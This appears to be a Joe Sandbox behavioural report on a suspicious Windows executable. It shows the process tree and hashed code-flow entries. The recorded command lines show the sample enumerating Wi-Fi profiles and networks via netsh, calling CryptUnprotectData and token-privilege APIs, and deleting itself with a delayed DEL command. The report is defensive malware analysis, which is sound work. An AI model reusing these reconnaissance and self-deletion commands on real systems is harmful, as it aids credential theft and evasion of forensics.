Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 53 75 63 63 65 73 73 22 2c 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d 0a
Data Ascii: {"message":"Success","status":true}


Target ID: 0
Start time: 21:06:57
Start date: 06/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x1d7a5710000
File size: 158'208 bytes
MD5 hash: C426F46F2C074EDA8C903F9868BE046D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 21:06:57
Start date: 06/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Imagebase: 0x7ff7f2ed0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 21:06:57
Start date: 06/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 21:06:57
Start date: 06/11/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6e6d80000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:netsh wlan show profiles
                                                                                        Imagebase:0x7ff742760000
                                                                                        File size:96'768 bytes
                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:21:06:57
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                        Imagebase:0x7ff73ec00000
                                                                                        File size:36'352 bytes
                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                        Imagebase:0x7ff7f2ed0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff6e6d80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:netsh wlan show networks mode=bssid
                                                                                        Imagebase:0x7ff742760000
                                                                                        File size:96'768 bytes
                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:21:06:58
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:findstr "SSID BSSID Signal"
                                                                                        Imagebase:0x7ff73ec00000
                                                                                        File size:36'352 bytes
                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x7ff7f2ed0000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0x7ff6e6d80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:21:07:01
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:timeout /t 3
                                                                                        Imagebase:0x7ff792cd0000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:16.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:100%
                                                                                          Total number of Nodes:29
                                                                                          Total number of Limit Nodes:2

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 3160d0f9c9c909625b5b1a0001e80c8e7b15bb654874e6ccd6e3b31b19d01e76
                                                                                          • Instruction ID: 04f42a37dec90a412a1f93f10070b5b876e1bbbd67ec2aef0a262ebb81852def
                                                                                          • Opcode Fuzzy Hash: 3160d0f9c9c909625b5b1a0001e80c8e7b15bb654874e6ccd6e3b31b19d01e76
                                                                                          • Instruction Fuzzy Hash: 1CB1E370A09A0D8FDB69DF98D895AB8BBF0FF59310F14017ED04ED7266DA35A842CB40

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6ec9c6ec7a87bbf06f10770f26c88346d949beec0c5a634e3493a4873c9ffa9
                                                                                          • Instruction ID: db517f47346fa90656f642f40ad0c7909726ea66bc1daa02f2ee060e9015fe46
                                                                                          • Opcode Fuzzy Hash: f6ec9c6ec7a87bbf06f10770f26c88346d949beec0c5a634e3493a4873c9ffa9
                                                                                          • Instruction Fuzzy Hash: CBC13A70E0965D8FDB98DF98D894BEDBBF1FB59300F1041AAD04DE3291DA346985CB50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptDataUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 834300711-0
                                                                                          • Opcode ID: 24a1daa970d61c548236eb872d2a49d15f704c17a5a843f59b78cbcfa220203b
                                                                                          • Instruction ID: c02d63e5384a83e686f5fcee56947f7e89271b1cd0755f328d51caad971ed29c
                                                                                          • Opcode Fuzzy Hash: 24a1daa970d61c548236eb872d2a49d15f704c17a5a843f59b78cbcfa220203b
                                                                                          • Instruction Fuzzy Hash: F3815E74E08A5D8FDB98DF18C855BE9B7F1FB59300F0042AAD44DE3291DB74A985CB41

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 187 7ffd9b8aed85-7ffd9b8aed91 188 7ffd9b8aed9c-7ffd9b8aeefd AdjustTokenPrivileges 187->188 189 7ffd9b8aed93-7ffd9b8aed9b 187->189 193 7ffd9b8aef05-7ffd9b8aef75 188->193 194 7ffd9b8aeeff 188->194 189->188 194->193
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 51ce368ca4b531b40401ed797833857841df8392e52f932cbc57d7e5636b9d40
                                                                                          • Instruction ID: 98228cd8351a78e758bd8445ed66082e030133d42cb2ae745520c31b929d6f7b
                                                                                          • Opcode Fuzzy Hash: 51ce368ca4b531b40401ed797833857841df8392e52f932cbc57d7e5636b9d40
                                                                                          • Instruction Fuzzy Hash: 8C611470908A1D8FDB98DF68D894BE9BBF1FB59311F1041AED44DE3291DB34A985CB40

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 197 7ffd9b8a9c62-7ffd9b8aeefd AdjustTokenPrivileges 201 7ffd9b8aef05-7ffd9b8aef75 197->201 202 7ffd9b8aeeff 197->202 202->201
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: ded50faa41577a782d790e083bbc8e357bc3b633ae97e9d9419ededb8ce186dc
                                                                                          • Instruction ID: 44fadc085513d8c26a6e135740a71a189471ef385407fe7064bbd60566e63df2
                                                                                          • Opcode Fuzzy Hash: ded50faa41577a782d790e083bbc8e357bc3b633ae97e9d9419ededb8ce186dc
                                                                                          • Instruction Fuzzy Hash: B6510170A08A1C8FDB98DF58D884BE9BBF1FB69311F1041AED44EE3251DA30A985CF40

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 205 7ffd9b8ab305-7ffd9b8ab455 NtQueryInformationToken 212 7ffd9b8ab457 205->212 213 7ffd9b8ab45d-7ffd9b8ab4a9 205->213 212->213
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 224fa9458b12feb50081e303ac65a368d84235a22f34bc2bc252790f50c5673b
                                                                                          • Instruction ID: 72954d499d34bd66b65dfcd4c2eb874564d2977239286e5136ebd31916da58dc
                                                                                          • Opcode Fuzzy Hash: 224fa9458b12feb50081e303ac65a368d84235a22f34bc2bc252790f50c5673b
                                                                                          • Instruction Fuzzy Hash: A6511570908A5C8FDF98DF58D894BE9BBF1FB6A310F1081AED44DE3251DA70A985CB40

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 215 7ffd9b8a9d2b-7ffd9b8ab455 NtQueryInformationToken 219 7ffd9b8ab457 215->219 220 7ffd9b8ab45d-7ffd9b8ab4a9 215->220 219->220
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQueryToken
                                                                                          • String ID:
                                                                                          • API String ID: 4239771691-0
                                                                                          • Opcode ID: 13787be2129c8b0bb3be638ed6dc4cfa43137ef8b9494671dc90eda4752ed484
                                                                                          • Instruction ID: 7adee41f9ddd0e65387edaa8fcdf00bd74afcd588c72bc728f02e9fb314e729a
                                                                                          • Opcode Fuzzy Hash: 13787be2129c8b0bb3be638ed6dc4cfa43137ef8b9494671dc90eda4752ed484
                                                                                          • Instruction Fuzzy Hash: 93510270A08A1C8FDB98DF58D894BE9BBF1FB69310F1091AED04DE3251DA30A985CF44

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 289 7ffd9b8ae3f9-7ffd9b8ae4e3 NtClose 293 7ffd9b8ae4e5 289->293 294 7ffd9b8ae4eb-7ffd9b8ae529 289->294 293->294
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 2de7fee5732fa3a96827d35aa47aef076ab2bc63998720130c2d95957f24aa22
                                                                                          • Instruction ID: c37a521534bbb77364ae549ea2071f0d05ca9497ab670384065d0b17bf009b79
                                                                                          • Opcode Fuzzy Hash: 2de7fee5732fa3a96827d35aa47aef076ab2bc63998720130c2d95957f24aa22
                                                                                          • Instruction Fuzzy Hash: 92414C70E08A4C8FDB59DF98D894BEDBBF0FF5A310F1041AAD049D7252DA709885CB51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 296 7ffd9b8a9d22-7ffd9b8ae4e3 NtClose 300 7ffd9b8ae4e5 296->300 301 7ffd9b8ae4eb-7ffd9b8ae529 296->301 300->301
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 8d76b67d40a5a6e5fb26ce6a070330046d117c0bf3396e99c5f29e2f77210e49
                                                                                          • Instruction ID: b885a9ace11a76ed2c7ead75e0118a4f071b4c87de6f8234808c007bdd4a966f
                                                                                          • Opcode Fuzzy Hash: 8d76b67d40a5a6e5fb26ce6a070330046d117c0bf3396e99c5f29e2f77210e49
                                                                                          • Instruction Fuzzy Hash: 7241F570A08A1C8FDB98DF98D495BEDBBF0FB59311F10416AD009E7251DA70A886CB50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 303 7ffd9b8a7b6d-7ffd9b8a7c57 CryptUnprotectData 308 7ffd9b8a7c59 303->308 309 7ffd9b8a7c5f-7ffd9b8a7cd2 303->309 308->309
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CryptDataUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 834300711-0
                                                                                          • Opcode ID: 918f8475181cffbc634d364f6290edfcb7f6237af6e55cf29b6cde9c080c3e1a
                                                                                          • Instruction ID: f21ded51305259db0eb8e1f2801902dd6f1270cd0c0e98e2cf0079f0fa0ba0cf
                                                                                          • Opcode Fuzzy Hash: 918f8475181cffbc634d364f6290edfcb7f6237af6e55cf29b6cde9c080c3e1a
                                                                                          • Instruction Fuzzy Hash: 2D41DB30E18A1D8FDBA8EF18C894BE9B7B1FB59300F0042A9D45DE3255DB74AA84CF41

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 447 7ffd9b8b502a-7ffd9b8b505f 449 7ffd9b8b5066-7ffd9b8b50ad call 7ffd9b8a04e8 447->449 450 7ffd9b8b5061 447->450 454 7ffd9b8b50b2-7ffd9b8b50f2 449->454 450->449 457 7ffd9b8b50f9-7ffd9b8b5130 454->457 458 7ffd9b8b50f4 454->458 460 7ffd9b8b5286-7ffd9b8b5290 457->460 458->457 461 7ffd9b8b5135-7ffd9b8b5140 460->461 462 7ffd9b8b5296-7ffd9b8b52c0 460->462 463 7ffd9b8b5147-7ffd9b8b5198 461->463 464 7ffd9b8b5142 461->464 468 7ffd9b8b519a-7ffd9b8b51be 463->468 469 7ffd9b8b51c0-7ffd9b8b51c2 463->469 464->463 470 7ffd9b8b51c5-7ffd9b8b51d2 468->470 469->470 471 7ffd9b8b51d8-7ffd9b8b520c 470->471 472 7ffd9b8b5279-7ffd9b8b5283 470->472 476 7ffd9b8b520e 471->476 477 7ffd9b8b5213-7ffd9b8b5255 471->477 472->460 476->477 479 7ffd9b8b5257 477->479 480 7ffd9b8b525c-7ffd9b8b5278 477->480 479->480 480->472
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9.
                                                                                          • API String ID: 0-1376035022
                                                                                          • Opcode ID: 6cae8bd1075a446d41c5bd7e14dbef1ee663030e4b84fb1d723a323e2f23824b
                                                                                          • Instruction ID: 522f122a9399ce6c33ac93464f3365da053b7fe3ea2bd3f9c555dfa34f14f226
                                                                                          • Opcode Fuzzy Hash: 6cae8bd1075a446d41c5bd7e14dbef1ee663030e4b84fb1d723a323e2f23824b
                                                                                          • Instruction Fuzzy Hash: 50910870E0961D8FDB95EBA8C465BECB7B1FF59300F1041A9D01DE72A5CA356985CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f991c36003597cbf27bc25c1821c8cb2fc85a3c938b1e6917dceb3271b31497
                                                                                          • Instruction ID: 6077ec7855c6ed172eb43b58ff61d4aaaeeed5009dcd32b97f22e6ef70acc759
                                                                                          • Opcode Fuzzy Hash: 4f991c36003597cbf27bc25c1821c8cb2fc85a3c938b1e6917dceb3271b31497
                                                                                          • Instruction Fuzzy Hash: 2692B430719A4D8FDB95EF68C865AB937E1FF59300B1500B9E45ECB2A6DE29EC02C711
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a36cb2a87955f98635ca20818a819e100bf4860b9de8475776b5e3a32f597072
                                                                                          • Instruction ID: 462c4a0bae1d80b3a8a5b4c72431800a4eb4cf2836658c170a249cc42cd5225c
                                                                                          • Opcode Fuzzy Hash: a36cb2a87955f98635ca20818a819e100bf4860b9de8475776b5e3a32f597072
                                                                                          • Instruction Fuzzy Hash: 6BD1E970E1A51D8FEBA4EB58C865BA8B7B1FF59300F5101F9D00DE35A2DA34AA85CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 740b3dcc46b171211d447c5cbe51f02e456941c8f3dcb5e57700ea3651ad63aa
                                                                                          • Instruction ID: ec2454bdd121744ea8323e6b0d6c6d7f6517975c26ce9991bb1caf9f006b2d21
                                                                                          • Opcode Fuzzy Hash: 740b3dcc46b171211d447c5cbe51f02e456941c8f3dcb5e57700ea3651ad63aa
                                                                                          • Instruction Fuzzy Hash: DCD1F970A1952D8FDBA9EB64C865BE8B3B1FF59304F1145E9D00EE3291DA35AA81CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2154a9e328ca3e7fb76f94eec79a70ce5ac9888d0c09573b9235b0c2bb845004
                                                                                          • Instruction ID: 30edacef64e171b30910e476240a013d3d3e838404539226dd3c108df33c0a2b
                                                                                          • Opcode Fuzzy Hash: 2154a9e328ca3e7fb76f94eec79a70ce5ac9888d0c09573b9235b0c2bb845004
                                                                                          • Instruction Fuzzy Hash: 30A1FB70E0962D8FDBA8EF54C8A4BE9B7B1FF59301F5101A9D00DE72A1DA346A85CF40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90232a928cf35067c58fbeffc901d900e202ddb0c727af21bad354fff0f4f202
                                                                                          • Instruction ID: a45c382303a2eeb3b28382e3c99f51c9ac5e988865abe8a2125dc3adda373e9e
                                                                                          • Opcode Fuzzy Hash: 90232a928cf35067c58fbeffc901d900e202ddb0c727af21bad354fff0f4f202
                                                                                          • Instruction Fuzzy Hash: D731A530E0952D8FDBA5EF98D890AECB7B5EF59300F5150A9D00DE7265CA34AE81CF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a66e727355a5f387511e088fa0e8c780172afa7a6a86cd589a5b6af0f991e60b
                                                                                          • Instruction ID: f25603e881699d96b7fb9fc04a0e12645dc7e58a53473361bbe37ca60ba6f64a
                                                                                          • Opcode Fuzzy Hash: a66e727355a5f387511e088fa0e8c780172afa7a6a86cd589a5b6af0f991e60b
                                                                                          • Instruction Fuzzy Hash: CDD0C931A05519CECB24EEA4E0025FAF331FB86315F1015BBD519E39A0C732E9218BC4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 81e3ee2c02ec50c9262b928b6d8aeeb77bb94d6606450d9f934b92126f792c0c
                                                                                          • Instruction ID: 7179eaf2ff923f949839dee7635493529a663cce3e6189f677980a12723a0149
                                                                                          • Opcode Fuzzy Hash: 81e3ee2c02ec50c9262b928b6d8aeeb77bb94d6606450d9f934b92126f792c0c
                                                                                          • Instruction Fuzzy Hash: 33129F34A19A8D8FEB68DF68C855BE93BE1FF59310F10417ED84EC7292DA34A941CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 204415e583f59cf5bedaf2a59b8d9176dd2de0de399f6a684d0013ac4a56f3ec
                                                                                          • Instruction ID: 74bd79dc653401e66bd89c6808229dd4d2ad5f0e00cc43315ee3fb9931dd9820
                                                                                          • Opcode Fuzzy Hash: 204415e583f59cf5bedaf2a59b8d9176dd2de0de399f6a684d0013ac4a56f3ec
                                                                                          • Instruction Fuzzy Hash: 0271A070A08A8D8FDFA8EF58C855BE97BE1FF59310F10412AE84DC7291DB749985CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
